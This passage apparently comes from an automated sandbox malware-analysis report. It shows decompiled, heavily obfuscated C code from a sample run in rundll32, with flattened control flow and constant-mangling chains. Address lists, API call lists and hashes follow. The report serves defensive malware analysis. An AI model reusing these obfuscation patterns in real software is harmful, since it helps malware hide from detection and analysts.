								_push(_t352);
								_push(0xb);
								E003780E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E00388519(_v360, _v348, _v292);
								E00388519(_v352, _v388, _t422);
								E00388519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E00374B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E0038F435( &_v292,  &_v284);
								} else {
									_t359 = E0038A666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x393e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x393e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x393e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t367 = 0x349a1a2;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									L1:
                                                                                                                                                            									_t332 = 0x61250f6;
                                                                                                                                                            									goto L2;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t367 == 0x70f4b52) {
                                                                                                                                                            							E00388519(_v372, _v380, _v276);
                                                                                                                                                            							_t367 = 0x2db8754;
                                                                                                                                                            							goto L33;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t367 == 0x97954ea) {
                                                                                                                                                            							_t335 =  *0x393e08; // 0x0
                                                                                                                                                            							_t338 =  *0x393e08; // 0x0
                                                                                                                                                            							_t343 =  *0x393e08; // 0x0
                                                                                                                                                            							_t345 = E0038E395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                                                            							_t425 =  &(_t425[0xb]);
                                                                                                                                                            							if(_t345 == 0) {
                                                                                                                                                            								_t414 = 0x54d1846;
                                                                                                                                                            								_t367 = 0x2db8754;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t367 = 0xcdb2e90;
                                                                                                                                                            							}
                                                                                                                                                            							while(1) {
                                                                                                                                                            								L1:
                                                                                                                                                            								_t332 = 0x61250f6;
                                                                                                                                                            								goto L2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t367 == 0xcdb2e90) {
                                                                                                                                                            							_t347 = E00375548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                                                            							_t425 =  &(_t425[4]);
                                                                                                                                                            							if(_t347 == 0) {
                                                                                                                                                            								_t414 = 0x54d1846;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t414 = 0xa80516a;
                                                                                                                                                            								_t364 = 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t367 = 0x70f4b52;
                                                                                                                                                            							while(1) {
                                                                                                                                                            								L1:
                                                                                                                                                            								_t332 = 0x61250f6;
                                                                                                                                                            								goto L2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t367 != 0xea9523f) {
                                                                                                                                                            							goto L34;
                                                                                                                                                            						}
                                                                                                                                                            						_t349 = E0037CF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                                                            						_t425 =  &(_t425[5]);
                                                                                                                                                            						if(_t349 == 0) {
                                                                                                                                                            							goto L37;
                                                                                                                                                            						}
                                                                                                                                                            						_t367 = 0x47b49b8;
                                                                                                                                                            						goto L1;
                                                                                                                                                            						L34:
                                                                                                                                                            					} while (_t367 != 0xa80516a);
                                                                                                                                                            					goto L37;
                                                                                                                                                            				}
                                                                                                                                                            			}

                                                                                                                                                            0x00376889
                                                                                                                                                            0x00376899
                                                                                                                                                            0x003768a1
                                                                                                                                                            0x003768a6
                                                                                                                                                            0x003768b0
                                                                                                                                                            0x003768b3
                                                                                                                                                            0x003768b7
                                                                                                                                                            0x003768bb
                                                                                                                                                            0x003768c3
                                                                                                                                                            0x003768c7
                                                                                                                                                            0x003768d2
                                                                                                                                                            0x003768dd
                                                                                                                                                            0x003768e8
                                                                                                                                                            0x003768f5
                                                                                                                                                            0x003768f9
                                                                                                                                                            0x00376901
                                                                                                                                                            0x00376909
                                                                                                                                                            0x0037690e
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691b
                                                                                                                                                            0x0037691d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376923
                                                                                                                                                            0x00376a56
                                                                                                                                                            0x00376a5b
                                                                                                                                                            0x00376a6d
                                                                                                                                                            0x00376a72
                                                                                                                                                            0x00376a73
                                                                                                                                                            0x00376a75
                                                                                                                                                            0x00376a7a
                                                                                                                                                            0x00376a7d
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037692f
                                                                                                                                                            0x00376a16
                                                                                                                                                            0x00376a25
                                                                                                                                                            0x00376a3d
                                                                                                                                                            0x00376a43
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bc8
                                                                                                                                                            0x0037693b
                                                                                                                                                            0x003769d8
                                                                                                                                                            0x003769da
                                                                                                                                                            0x003769df
                                                                                                                                                            0x003769e6
                                                                                                                                                            0x003769ed
                                                                                                                                                            0x003769f4
                                                                                                                                                            0x003769fd
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376947
                                                                                                                                                            0x00376999
                                                                                                                                                            0x003769a9
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x0037699b
                                                                                                                                                            0x003769ae
                                                                                                                                                            0x003769b7
                                                                                                                                                            0x003769bc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003769bc
                                                                                                                                                            0x0037694f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376955
                                                                                                                                                            0x0037695e
                                                                                                                                                            0x00376960
                                                                                                                                                            0x00376963
                                                                                                                                                            0x00376966
                                                                                                                                                            0x0037696b
                                                                                                                                                            0x00376970
                                                                                                                                                            0x00376970
                                                                                                                                                            0x00376973
                                                                                                                                                            0x0037697a
                                                                                                                                                            0x00376bdb
                                                                                                                                                            0x00376be1
                                                                                                                                                            0x00376be8
                                                                                                                                                            0x00376bf1
                                                                                                                                                            0x00376980
                                                                                                                                                            0x00376980
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x0037697a
                                                                                                                                                            0x00376a8d
                                                                                                                                                            0x00376bbd
                                                                                                                                                            0x00376bc3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bc3
                                                                                                                                                            0x00376a99
                                                                                                                                                            0x00376b34
                                                                                                                                                            0x00376b4c
                                                                                                                                                            0x00376b7d
                                                                                                                                                            0x00376b89
                                                                                                                                                            0x00376b8e
                                                                                                                                                            0x00376b93
                                                                                                                                                            0x00376b9f
                                                                                                                                                            0x00376ba4
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376b95
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376aa5
                                                                                                                                                            0x00376b0f
                                                                                                                                                            0x00376b14
                                                                                                                                                            0x00376b19
                                                                                                                                                            0x00376b25
                                                                                                                                                            0x00376b1b
                                                                                                                                                            0x00376b1d
                                                                                                                                                            0x00376b22
                                                                                                                                                            0x00376b22
                                                                                                                                                            0x00376b2a
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376916
                                                                                                                                                            0x00376aad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376ad6
                                                                                                                                                            0x00376adb
                                                                                                                                                            0x00376ae0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376ae6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bcd
                                                                                                                                                            0x00376bcd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376bd9

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                                            • API String ID: 0-2895984816
                                                                                                                                                            • Opcode ID: 647cfcd5b443f6fd6dc96c79f4c6902397fae48d6853c9e9fe1a1b63e21bb1c2
                                                                                                                                                            • Instruction ID: 4c1178e7d857cf17106821bf0b54879b7c2d772a932b7feb1da7c1dd6f347291
                                                                                                                                                            • Opcode Fuzzy Hash: 647cfcd5b443f6fd6dc96c79f4c6902397fae48d6853c9e9fe1a1b63e21bb1c2
                                                                                                                                                            • Instruction Fuzzy Hash: 370256725087809FC3A9CF65C596A5BBBE1FBC5318F20890DF6DA86260C7B4C949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                                            • CharUpperA.USER32 ref: 10021943
                                                                                                                                                            • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3249967234-0
                                                                                                                                                            • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                                            • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                                            • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                                            • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00375E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				void* _t339;
                                                                                                                                                            				intOrPtr _t372;
                                                                                                                                                            				void* _t374;
                                                                                                                                                            				intOrPtr _t381;
                                                                                                                                                            				intOrPtr _t382;
                                                                                                                                                            				void* _t384;
                                                                                                                                                            				intOrPtr* _t385;
                                                                                                                                                            				void* _t387;
                                                                                                                                                            				intOrPtr _t421;
                                                                                                                                                            				intOrPtr* _t423;
                                                                                                                                                            				signed int _t424;
                                                                                                                                                            				signed int _t425;
                                                                                                                                                            				signed int _t426;
                                                                                                                                                            				signed int _t427;
                                                                                                                                                            				signed int _t428;
                                                                                                                                                            				signed int _t429;
                                                                                                                                                            				signed int _t430;
                                                                                                                                                            				signed int _t431;
                                                                                                                                                            				signed int _t432;
                                                                                                                                                            				signed int _t433;
                                                                                                                                                            				signed int _t434;
                                                                                                                                                            				signed int* _t437;
                                                                                                                                                            
                                                                                                                                                            				_t385 = _a8;
                                                                                                                                                            				_push(_t385);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_t423 = __ecx;
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t339);
                                                                                                                                                            				_v12 = 0xbcdf6a;
                                                                                                                                                            				_t437 =  &(( &_v148)[4]);
                                                                                                                                                            				_t421 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_t387 = 0xc04f77e;
                                                                                                                                                            				_v92 = 0x11f6ef;
                                                                                                                                                            				_v92 = _v92 + 0xffffb184;
                                                                                                                                                            				_t424 = 0x71;
                                                                                                                                                            				_v92 = _v92 / _t424;
                                                                                                                                                            				_t425 = 0x24;
                                                                                                                                                            				_v92 = _v92 / _t425;
                                                                                                                                                            				_v92 = _v92 ^ 0x0000011d;
                                                                                                                                                            				_v56 = 0xfaa796;
                                                                                                                                                            				_v56 = _v56 >> 0xc;
                                                                                                                                                            				_v56 = _v56 << 0xa;
                                                                                                                                                            				_v56 = _v56 ^ 0x003ea801;
                                                                                                                                                            				_v36 = 0x1650e4;
                                                                                                                                                            				_v36 = _v36 + 0xce7;
                                                                                                                                                            				_v36 = _v36 ^ 0x00165dcb;
                                                                                                                                                            				_v116 = 0x54bb44;
                                                                                                                                                            				_v116 = _v116 + 0xffff1cdd;
                                                                                                                                                            				_v116 = _v116 + 0xffffa99d;
                                                                                                                                                            				_v116 = _v116 + 0xa8e5;
                                                                                                                                                            				_v116 = _v116 ^ 0x00542aa3;
                                                                                                                                                            				_v148 = 0xce1ee6;
                                                                                                                                                            				_v148 = _v148 ^ 0xff8bbe67;
                                                                                                                                                            				_v148 = _v148 | 0x521cb43f;
                                                                                                                                                            				_v148 = _v148 << 1;
                                                                                                                                                            				_v148 = _v148 ^ 0xfebb697e;
                                                                                                                                                            				_v52 = 0xc2bf1c;
                                                                                                                                                            				_v52 = _v52 << 0xc;
                                                                                                                                                            				_t426 = 0x73;
                                                                                                                                                            				_v52 = _v52 / _t426;
                                                                                                                                                            				_v52 = _v52 ^ 0x0061d2eb;
                                                                                                                                                            				_v88 = 0x8d6fba;
                                                                                                                                                            				_v88 = _v88 * 0x6a;
                                                                                                                                                            				_v88 = _v88 * 0x21;
                                                                                                                                                            				_v88 = _v88 >> 0xb;
                                                                                                                                                            				_v88 = _v88 ^ 0x00119314;
                                                                                                                                                            				_v48 = 0xec8dbc;
                                                                                                                                                            				_v48 = _v48 + 0xffff0a61;
                                                                                                                                                            				_v48 = _v48 | 0x0a9d8147;
                                                                                                                                                            				_v48 = _v48 ^ 0x0affcc17;
                                                                                                                                                            				_v24 = 0xd16d2c;
                                                                                                                                                            				_v24 = _v24 >> 2;
                                                                                                                                                            				_v24 = _v24 ^ 0x003dd5e6;
                                                                                                                                                            				_v124 = 0xaffa28;
                                                                                                                                                            				_v124 = _v124 >> 9;
                                                                                                                                                            				_v124 = _v124 * 9;
                                                                                                                                                            				_v124 = _v124 ^ 0x3775f33c;
                                                                                                                                                            				_v124 = _v124 ^ 0x377a4e54;
                                                                                                                                                            				_v76 = 0x9eb952;
                                                                                                                                                            				_v76 = _v76 >> 0xd;
                                                                                                                                                            				_v76 = _v76 << 0xa;
                                                                                                                                                            				_v76 = _v76 ^ 0x00160abd;
                                                                                                                                                            				_v108 = 0x8bec79;
                                                                                                                                                            				_t427 = 0x28;
                                                                                                                                                            				_v108 = _v108 * 0x30;
                                                                                                                                                            				_v108 = _v108 + 0xffff86d5;
                                                                                                                                                            				_v108 = _v108 + 0xffff5405;
                                                                                                                                                            				_v108 = _v108 ^ 0x1a3a719b;
                                                                                                                                                            				_v132 = 0x74267e;
                                                                                                                                                            				_v132 = _v132 + 0x1b76;
                                                                                                                                                            				_v132 = _v132 << 4;
                                                                                                                                                            				_v132 = _v132 + 0xffff1414;
                                                                                                                                                            				_v132 = _v132 ^ 0x074c11a2;
                                                                                                                                                            				_v100 = 0x4236e1;
                                                                                                                                                            				_v100 = _v100 ^ 0x96e608d5;
                                                                                                                                                            				_v100 = _v100 / _t427;
                                                                                                                                                            				_t428 = 0x2d;
                                                                                                                                                            				_v100 = _v100 * 0x6c;
                                                                                                                                                            				_v100 = _v100 ^ 0x96bd808a;
                                                                                                                                                            				_v84 = 0xb83730;
                                                                                                                                                            				_v84 = _v84 + 0xffffd15d;
                                                                                                                                                            				_v84 = _v84 >> 0xb;
                                                                                                                                                            				_v84 = _v84 ^ 0x0009ec33;
                                                                                                                                                            				_v140 = 0x532b06;
                                                                                                                                                            				_v140 = _v140 ^ 0xb0124270;
                                                                                                                                                            				_v140 = _v140 << 1;
                                                                                                                                                            				_v140 = _v140 / _t428;
                                                                                                                                                            				_v140 = _v140 ^ 0x02279f8d;
                                                                                                                                                            				_v44 = 0x33dfa;
                                                                                                                                                            				_v44 = _v44 + 0x1c37;
                                                                                                                                                            				_v44 = _v44 ^ 0x000817ba;
                                                                                                                                                            				_v136 = 0x1bf887;
                                                                                                                                                            				_v136 = _v136 ^ 0x189cf430;
                                                                                                                                                            				_v136 = _v136 + 0xffff0896;
                                                                                                                                                            				_v136 = _v136 ^ 0xf213b32f;
                                                                                                                                                            				_v136 = _v136 ^ 0xea9313b1;
                                                                                                                                                            				_v144 = 0xffa314;
                                                                                                                                                            				_v144 = _v144 >> 7;
                                                                                                                                                            				_v144 = _v144 ^ 0x35f9e2de;
                                                                                                                                                            				_t429 = 0x1f;
                                                                                                                                                            				_v144 = _v144 * 0x5b;
                                                                                                                                                            				_v144 = _v144 ^ 0x2f3e99d8;
                                                                                                                                                            				_v68 = 0x41f910;
                                                                                                                                                            				_v68 = _v68 / _t429;
                                                                                                                                                            				_v68 = _v68 ^ 0x28681de5;
                                                                                                                                                            				_v68 = _v68 ^ 0x2865ac71;
                                                                                                                                                            				_v96 = 0x6e33;
                                                                                                                                                            				_v96 = _v96 << 4;
                                                                                                                                                            				_v96 = _v96 ^ 0xe7b8475a;
                                                                                                                                                            				_v96 = _v96 << 1;
                                                                                                                                                            				_v96 = _v96 ^ 0xcf7b3a2b;
                                                                                                                                                            				_v104 = 0xedfca3;
                                                                                                                                                            				_t430 = 0x5e;
                                                                                                                                                            				_v104 = _v104 * 0x5f;
                                                                                                                                                            				_v104 = _v104 | 0x0b07679d;
                                                                                                                                                            				_v104 = _v104 ^ 0xc050dc4c;
                                                                                                                                                            				_v104 = _v104 ^ 0x9b058770;
                                                                                                                                                            				_v112 = 0xe25509;
                                                                                                                                                            				_v112 = _v112 ^ 0xf6d0fdca;
                                                                                                                                                            				_v112 = _v112 / _t430;
                                                                                                                                                            				_v112 = _v112 ^ 0x02984cdf;
                                                                                                                                                            				_v40 = 0xf7137d;
                                                                                                                                                            				_v40 = _v40 << 8;
                                                                                                                                                            				_v40 = _v40 ^ 0xf71f8dee;
                                                                                                                                                            				_v64 = 0x5508e8;
                                                                                                                                                            				_v64 = _v64 << 4;
                                                                                                                                                            				_v64 = _v64 | 0x94c676b5;
                                                                                                                                                            				_v64 = _v64 ^ 0x95dffb87;
                                                                                                                                                            				_v120 = 0xc732ae;
                                                                                                                                                            				_t431 = 0x75;
                                                                                                                                                            				_v120 = _v120 / _t431;
                                                                                                                                                            				_v120 = _v120 << 7;
                                                                                                                                                            				_t432 = 0x2c;
                                                                                                                                                            				_v120 = _v120 / _t432;
                                                                                                                                                            				_v120 = _v120 ^ 0x000601dd;
                                                                                                                                                            				_v72 = 0x179b9;
                                                                                                                                                            				_v72 = _v72 >> 1;
                                                                                                                                                            				_v72 = _v72 << 0xb;
                                                                                                                                                            				_v72 = _v72 ^ 0x05ec7a60;
                                                                                                                                                            				_v28 = 0x46261b;
                                                                                                                                                            				_t433 = 0x35;
                                                                                                                                                            				_v28 = _v28 / _t433;
                                                                                                                                                            				_v28 = _v28 ^ 0x000e773f;
                                                                                                                                                            				_v128 = 0xfd046c;
                                                                                                                                                            				_v128 = _v128 << 1;
                                                                                                                                                            				_v128 = _v128 << 3;
                                                                                                                                                            				_v128 = _v128 + 0xffff42a9;
                                                                                                                                                            				_v128 = _v128 ^ 0x0fc89804;
                                                                                                                                                            				_v60 = 0xb39cb2;
                                                                                                                                                            				_v60 = _v60 + 0xffffa360;
                                                                                                                                                            				_v60 = _v60 ^ 0x6e5a7866;
                                                                                                                                                            				_v60 = _v60 ^ 0x6eef17c9;
                                                                                                                                                            				_v32 = 0xb015d5;
                                                                                                                                                            				_t434 = 0x33;
                                                                                                                                                            				_v32 = _v32 / _t434;
                                                                                                                                                            				_v32 = _v32 ^ 0x00082471;
                                                                                                                                                            				_v80 = 0x87b3ae;
                                                                                                                                                            				_v80 = _v80 + 0xffffe530;
                                                                                                                                                            				_v80 = _v80 << 2;
                                                                                                                                                            				_v80 = _v80 ^ 0x021b575c;
                                                                                                                                                            				while(_t387 != 0x5e373ec) {
                                                                                                                                                            					if(_t387 == 0x87b20b3) {
                                                                                                                                                            						_t372 =  *0x393dfc; // 0x0
                                                                                                                                                            						_t374 = E0037CA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
                                                                                                                                                            						_t437 =  &(_t437[0x12]);
                                                                                                                                                            						if(_t374 == _v88) {
                                                                                                                                                            							 *_t385 = _v20;
                                                                                                                                                            							_t421 = 1;
                                                                                                                                                            							 *((intOrPtr*)(_t385 + 4)) = _v16;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t387 = 0x5e373ec;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						if(_t387 == 0xc04f77e) {
                                                                                                                                                            							_t387 = 0xd382560;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t387 == 0xc68a5f7) {
                                                                                                                                                            								_push(_t387);
                                                                                                                                                            								_push(_t387);
                                                                                                                                                            								_t381 = E00377FF2(_v16);
                                                                                                                                                            								_v20 = _t381;
                                                                                                                                                            								if(_t381 != 0) {
                                                                                                                                                            									_t387 = 0x87b20b3;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t387 != 0xd382560) {
                                                                                                                                                            									L14:
                                                                                                                                                            									if(_t387 != 0x4d23f0b) {
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									_t382 =  *0x393dfc; // 0x0
                                                                                                                                                            									_t384 = E0037CA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                                                            									_t437 =  &(_t437[0x12]);
                                                                                                                                                            									if(_t384 == _v148) {
                                                                                                                                                            										_t387 = 0xc68a5f7;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					return _t421;
                                                                                                                                                            				}
                                                                                                                                                            				E00388519(_v32, _v80, _v20);
                                                                                                                                                            				_t387 = 0x4d23f0b;
                                                                                                                                                            				goto L14;
                                                                                                                                                            			}





























































                                                                                                                                                            0x00376035
                                                                                                                                                            0x00376038
                                                                                                                                                            0x0037603c
                                                                                                                                                            0x00376044
                                                                                                                                                            0x0037604c
                                                                                                                                                            0x00376054
                                                                                                                                                            0x0037605c
                                                                                                                                                            0x00376064
                                                                                                                                                            0x00376069
                                                                                                                                                            0x00376071
                                                                                                                                                            0x00376079
                                                                                                                                                            0x00376081
                                                                                                                                                            0x00376091
                                                                                                                                                            0x0037609a
                                                                                                                                                            0x0037609d
                                                                                                                                                            0x003760a1
                                                                                                                                                            0x003760a9
                                                                                                                                                            0x003760b1
                                                                                                                                                            0x003760b9
                                                                                                                                                            0x003760be
                                                                                                                                                            0x003760c6
                                                                                                                                                            0x003760ce
                                                                                                                                                            0x003760d6
                                                                                                                                                            0x003760e2
                                                                                                                                                            0x003760e6
                                                                                                                                                            0x003760ee
                                                                                                                                                            0x003760f6
                                                                                                                                                            0x003760fe
                                                                                                                                                            0x00376106
                                                                                                                                                            0x0037610e
                                                                                                                                                            0x00376116
                                                                                                                                                            0x0037611e
                                                                                                                                                            0x00376126
                                                                                                                                                            0x0037612e
                                                                                                                                                            0x00376136
                                                                                                                                                            0x0037613b
                                                                                                                                                            0x00376148
                                                                                                                                                            0x0037614b
                                                                                                                                                            0x0037614f
                                                                                                                                                            0x00376157
                                                                                                                                                            0x00376167
                                                                                                                                                            0x0037616b
                                                                                                                                                            0x00376173
                                                                                                                                                            0x0037617b
                                                                                                                                                            0x00376183
                                                                                                                                                            0x00376188
                                                                                                                                                            0x00376190
                                                                                                                                                            0x00376194
                                                                                                                                                            0x0037619c
                                                                                                                                                            0x003761a9
                                                                                                                                                            0x003761aa
                                                                                                                                                            0x003761ae
                                                                                                                                                            0x003761b6
                                                                                                                                                            0x003761be
                                                                                                                                                            0x003761c6
                                                                                                                                                            0x003761ce
                                                                                                                                                            0x003761dc
                                                                                                                                                            0x003761e8
                                                                                                                                                            0x003761f0
                                                                                                                                                            0x003761fa
                                                                                                                                                            0x003761ff
